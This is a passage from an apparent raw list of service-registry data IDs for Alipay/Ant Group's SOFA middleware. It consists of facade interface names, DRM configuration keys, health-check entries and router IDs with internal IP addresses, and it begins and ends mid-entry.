antfin.rayag.facade.service.dsl.DSLModelService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.frservcenter.facade.api.category.SceneTypeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mirrormng.facade.api.MirrorPlaybackControlFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcardcore.common.service.facade.underwrite.UnderwriteQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.afsc.common.service.amc.service.AmcToolTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acprodapicore.facade.service.ClusterServiceFacade:1.0:core@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finsign.common.service.facade.finauth.service.ExpressSignAuthFacade:1.0@DEFAULT@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.prodquery.common.service.api.ContractMngQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.153.134#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.tradeapcore:name=com.alipay.echox.drm.EchoRecordConfigDrm.recordConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.insttrade:name=com.alipay.common.tracer.manage.TracerDrm.zdalOssDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.autoaftermarket.common.service.merchant.AutoIspSyncOutOrderFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.217.6#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.koubei.kbindustryomp.common.service.facade.api.merchant.MerchantApplyManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secuprod.biz.service.gw.community.api.user.SecuUserPrivacyManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.atd.app.service.facade.AtdServiceApplyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.33.201#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:com.alipay.antscheduler.facade.IClientFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","HEALTHY_V2@fincommontaskhub#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","config:com.alipay.pcloanamountprod.common.service.facade.service.credit.CreditAcceptFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.insttrade:name=com.alipay.insttrade.core.service.drm.AcsAccountDRM.microAcsRequestIdWhiteList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.instservicegovern.common.facade.api.InstServiceAbilityQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.decisionx.facade.InnerDecisionService:1.0:pucprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.swiftbaascore.api.facade.SpaceAdminFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openctrl.facade.rcache.RCacheConfigManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.abilitycore.common.service.facade.mng.AbilityDynamicMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.anteduprod.common.service.facade.api.certify.StudentCampusCertifyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mpromocenter.operation.common.service.facade.api.label.LabelShopFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifemng.facade.ebppprod.RechargeOperatorProductFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.platform.schedule.concurrent.execute.Executer:1.0:launchReviewTaskExecuter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cfmng:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.jdbcUrlCheckEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.73.27.56#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mappprod.core.service.publisher.MsgBrokerPublisher:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.icif.service.facade.api.UserContactService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cicada.common.service.facade.api.dynamicview.FaceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.iaccenter.facade.query.api.TitleRuleQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.mservicesinspect.service.facade.service.DetectQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.sofa.rpc.elastic.ElasticService:1.0:financeprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@compmng#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","DATA_ID_30.50.66.147#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.riskmng:name=com.alipay.riskmng.common.dal.drm.DataSourceSwitchResource.usePrimaryDatabase,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.160.158.216#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_100.83.242.104#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.gfinvest.facade.api.investtrade.InvestSecurityDealOtherRightsFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.contentlib.common.service.facade.payment.BenefitFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.100.75#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.securitycap:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.checkIntervalWhenDisableSync,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.opscloudcore.common.service.facade.execute.callback.ChangeServiceExecutionCallback:1.0:opsware_extension@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.monitor.drm.cloudinc.cloudincDatasource.validator,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.securityops.common.service.client.spi.SecOpsChangeCallbackService:1.0:holoxmng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.lendpofprod.core.shared.drm.MiniLoanConfigDrm.newUserWhiteListStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.102.208.174#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.pkgcore.common.service.facade.MiniAppModelQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cicadax.facade.api.CicadaXBuildFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tradequote.api.FalconEmendL2Facade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.185.88#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.iaassettrans.facade.common.astconfig.api.AstconfigQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fincommontaskhub.service.facade.service.spi.SliceQueryService:1.0:scsupport@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finslip.common.service.facade.recon.ReconRecoveryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.166.158.208#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.finpwm:name=com.alipay.finpwm.aip.detail.drm.AipOrderDRMResource.genNumPerTable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.pdcore.bizrule.facade.BizRuleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securityexprod.common.service.facade.eworkcard.EworkCardUsableFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insopenprod.common.service.facade.api.InsLifeApiFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapires.biz.api.manager.ApiTriggerManager:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.platform.schedule.concurrent.execute.Executer:1.0:fxSchedulerExecuter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.AntVip-Server:name=com.alipay.antvip.server.conf.DrmControl.monitorTickDurationSec,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zpdcore:name=com.alipay.fc.pdcore.common.service.cacheclient.drm.ClientCacheConfigDRM.sysEnv,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.30.208.21#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.gotone.common.service.api.SendWalletMsgService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cscheck.service.facade.api.QcTrainStrategyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.messagefusion.inner.facade.api.MsgMetricInnerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.publichome.common.service.facade.app.QueryAppOrderStatusFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitydata.common.service.facade.BloomFilterQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkpromocore.common.manage.facade.CrowdManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_PROMOITEM#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dataphin.schedule.operation.platform.facade.baseline.EndnodeApi:1.0:schedule-operation-platform@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instopen.service.facade.permission.PermissionServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_ALI_TP_S_BC_DAMAI#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alibaba.dataphin.project.common.facade.api.ProjectApi:1.0:dpproject@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.trustlife.tis.mutual.claim.facade.endpoint.RegisterFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.mychain.baas.common.user.service.UserService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.insautomarket.common.integration.insmarketingcore.camp.InsMktCampaignFacadeClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.taskcenter.common.service.facade.TaskAppointmentService:1.0.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.ipaydecision.service.api.PayChannelConsultService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dchainconfigcenter.facade.config.api.ConfigurationAdminService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.160.40#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.iexratecenter.service.facade.api.ExAgreementQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.frastress.common.service.facade.api.bizindicator.IndicatorCalcFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.miniprod.common.service.facade.api.indirect.IndirectPartnerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifemsgprod.common.service.facade.admin.punishment.LifeTemplateForbidAdminFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mcenter.common.dal.mdata.auto.daointerface.MdataAccountSettleDAO:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.autoaftermarket.common.service.check.AutoCheckQueryFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilecashier.senior.service.facade.MobilecashierOrderFacade:1.0:fascore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:cutOver_ProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fincommontaskhub.service.facade.service.spi.FinalizeService:1.0:finpromoscene@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finasmcore.biz.activity.message.AppointmentSyncEventHandlerTest:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.realtimecheckprod.common.facade.DemandManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rinsight.common.service.facade.GraphQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.145.177#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.kbreservationprod.common.service.facade.commonreservation.ShopBasicDataQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.mif.common.service.facade.MerchantShopFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestprod.common.service.facade.api.BusinessCheckFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openapi.common.service.client.SysAppInvokeService:1.0:securityexprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbtemplate.common.service.facade.assemble.AbSnapshotAssembleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finsign.common.service.facade.finauth.service.ExpressSignAuthFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.mobileprod.common.service.facade.cdp.ContentManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.100.73#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.50.125.239#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.73.27.66#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.voucherprod.facade.api.template.VcpStoreSearchFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appxagg.common.service.facade.api.management.community.CommunityContentMngConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finsign.common.service.facade.base.service.FinsignConsultService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.alisis.core.service.compass.ServerHolderService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchmobile.common.service.facade.widget.mng.WhiteListUserFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.155.140#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.paymentmng.service.facade.payacceptance.AgrtProdToolManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.einvoice.prod.facade.service.EinvoiceTaxCodeService:1.0@tri#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promocenter.facade.api.tag.ActivityTagManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_S_1212#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.argo.spi.publish.CustomDeployFacade:1.0:ins.coverage.suminsured.decrease@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:ngfemeta@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ropcn.common.service.facade.api.analyze.RopAnalyzeService:1.0:ropcn-analyze-service@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundcore.common.service.facade.UserRecommendProductFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.24.163#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.finstrategy:name=com.alipay.finstrategy.common.service.facadeseven.fixedinvestment.drm.NewSyncControlDrmImpl.oldSysForbiddenToWriteJson,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.timeout.common.service.facade.api.TimeoutExecutor:1.0:tradecore@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cif.facade.PasswordSecureInfoQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditschedule.service.facade.spi.ExecuteService:1.0:pcloanamountprod.jbTempAmountLockOperationExecuteService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinbaseprod.biz.antsearch.AntSearchService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.event.api.input.EventReceiverService:1.0:SL__TP_F_SC_RATE_MSG_SEND_TASK@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.findecision:name=com.alipay.routeclient.DefaultRouteCoordinator.elasticRuleVersion,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.secuprod.biz.service.gw.community.api.user.SecuUserPrivacyManager:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csrobotmng.bot.facade.test.BotTestFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mapi.facade.partner.PartnerCertFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.findatacanal.common.service.manage.gildata.CommonSyncFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.217.210#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.vouchercore.facade.api.template.BudgetManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.agdsdatahub.service.facade.quota.QuotaProcessFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fininfo:name=com.alipay.finnet.service.drm.ChannelFilterDRM.orgInstChannelApiFilterSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Pub_Servers_TP_M_ITEM_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.coffeepayweb:name=com.alipay.routeclient.DefaultRouteCoordinator.drFlagEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.mybank.bkwirelessdataportal.common.service.panda.MaterialManagerFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","cn.com.antcloud.acoffercenter.common.service.facade.template.TemplateParserManageFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_11.124.126.61#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.dqs.sdk.server.IExportService#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:distinguishprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fcbuservice.common.service.facade.AttributeFacade:1.0:antyixin@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.bizprodmng:name=com.alipay.cif.model.cache.CifCOControlSwitch.switchCustCertifyInfo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.160.177.18#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.50.40.119#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.bigfish:name=com.alipay.sla.businessgray.drm.BusinessGrayGlobalSwitcher.debug,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.inscommunity.common.service.facade.CommentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.recmixer.common.service.facade.CategoryRecProviderService:1.0:promocommopt@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.rdf.ficc.common.loadtestableschedule.drm.LoadTestableScheduleDrm.EC_finpwm_capital_fixed_redeem_normal.loadTestEnabled,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finpromoprod.common.service.facade.divide.DivideRecordFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ordermng:name=com.alipay.fc.arcore.abtest.openIgnoreSeq,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.superapires.facade.exterface.ExterfaceInfoFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.authprod.facade.AppInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gotone.common.service.api.GotoneBusinessConfigService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.socialcore.facade.operation.OperationRecordFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_C_TELSELFHELP#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","cn.com.antcloud.aciamcore.common.service.facade.access.RoleServiceFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.zappinfo:name=com.alipay.common.security.dresource.SecurityCommonDrm.defaultCorsCheckerEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mcomment.common.service.facade.comment.CollectUpdateFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:miniAlipayOnlineAuditProcessor@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloud.apfasmng.biz.shared.oss.OSSPrivateAPI#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.opencore.service.facade.encrypt.EncryptQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.Arch:name=com.alipay.cif.client.drm.CifClientDrmSwitch.fraudmng.clientReadGroupSwitch,version=1.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","cn.com.antcloud.acauthcore.common.service.facade.manager.RoleManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finvirtualta.core.service.fund.repository.AccountContractRepository:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.Arch:name=com.alipay.scheduler.common.cluster.resource.TaskAssignResource.assignInMaster,version=1.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.mobileiclib.common.service.facade.token.spi.VerifyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.bizops.facade.DataCalculationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:pcreditdecisionx@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundprod.common.service.facade.product.manage.ProductIndicatorFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secuinfos.common.service.facade.api.datasync.BrandInfoSyncFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbservcore.common.service.client.spi.SPInterface:1.0:kbservcenterSPInterface@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.paymentmng:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.vmEmergencyActions,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.socialcore.facade.district.DistrictFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dbackprod.service.facade.api.ApplyTransferToCardService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.30.208.13#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.changerequirement.facade.api.ChangeIterationAsyncCheckFacade:1.0:changeiteration@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finbatch:name=com.alipay.finsupport.component.cache.ctrldata.drm.NuccWhiteListDRM.nuccInstChannelApis,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.habaseline.common.facade.view.troublehunter.service.AppQueryServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ass.common.service.client.AssClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promox.facade.crowd.CrowdFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.platform.xts.bacs.spi.BusinessActivityStateResolver:1.0:cfpcenter@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zpaas.zappinfo.facade.query.AppBaselineConfigQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acauthcore.common.service.facade.manager.ActionManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_C_FINSERVICE_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:rcdisposal@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.cif.model.cache.CifCOControlSwitch.consistCheckWhiteListString,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.benefitcore.common.service.facade.api.BenefitMarketingManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.mobileiclib.common.service.facade.product.spi.SecurityBiologyProductStreamService:1.0:mediafeature@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.alideviceinfo.common.service.facade.dycode.DynamicCodeFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileiclib.common.service.facade.admin.service.StrategyPacketFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.omp.common.service.facade.api.ToolTemplateService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antmembermng.common.service.facade.mtconfig.service.EventTaskConfigService:1.0:mngEventConfigService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.oceanbase.obforumcore.service.open.common.FormOpenFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.etetestcore:name=com.alipay.etetestcore.service.integration.drm.DrmResourceManager.userIdsForPreTest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.158.91.71#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.ap.apshopcenter.common.service.facade.CityInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antcloud.dds.zdal.interfaces.endpoint.facade.rest.DbkeyMappingRestFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.minitrans.service.facade.highvalue.api.HvtransQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudengine:name=com.alipay.cloudengine.resmanager.findecision.resValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.salesmng.common.service.facade.sales.SharedataPathService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkinstportal.common.service.facade.userkonw.api.UserKnowFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.meshyserver.common.service.facade.spi.BizSheetFacade:1.0:mrchpromoprodBizSheet@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkdepmng_arragementUnfreezeCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.airbops:name=com.alipay.cif.model.cache.CifCOControlSwitch.checkArgConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.accenter.service.facade.api.AccenterCategoryManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cifcommon.business.platform.o2o.facade.MerchantRelationFacade:1.0@DEF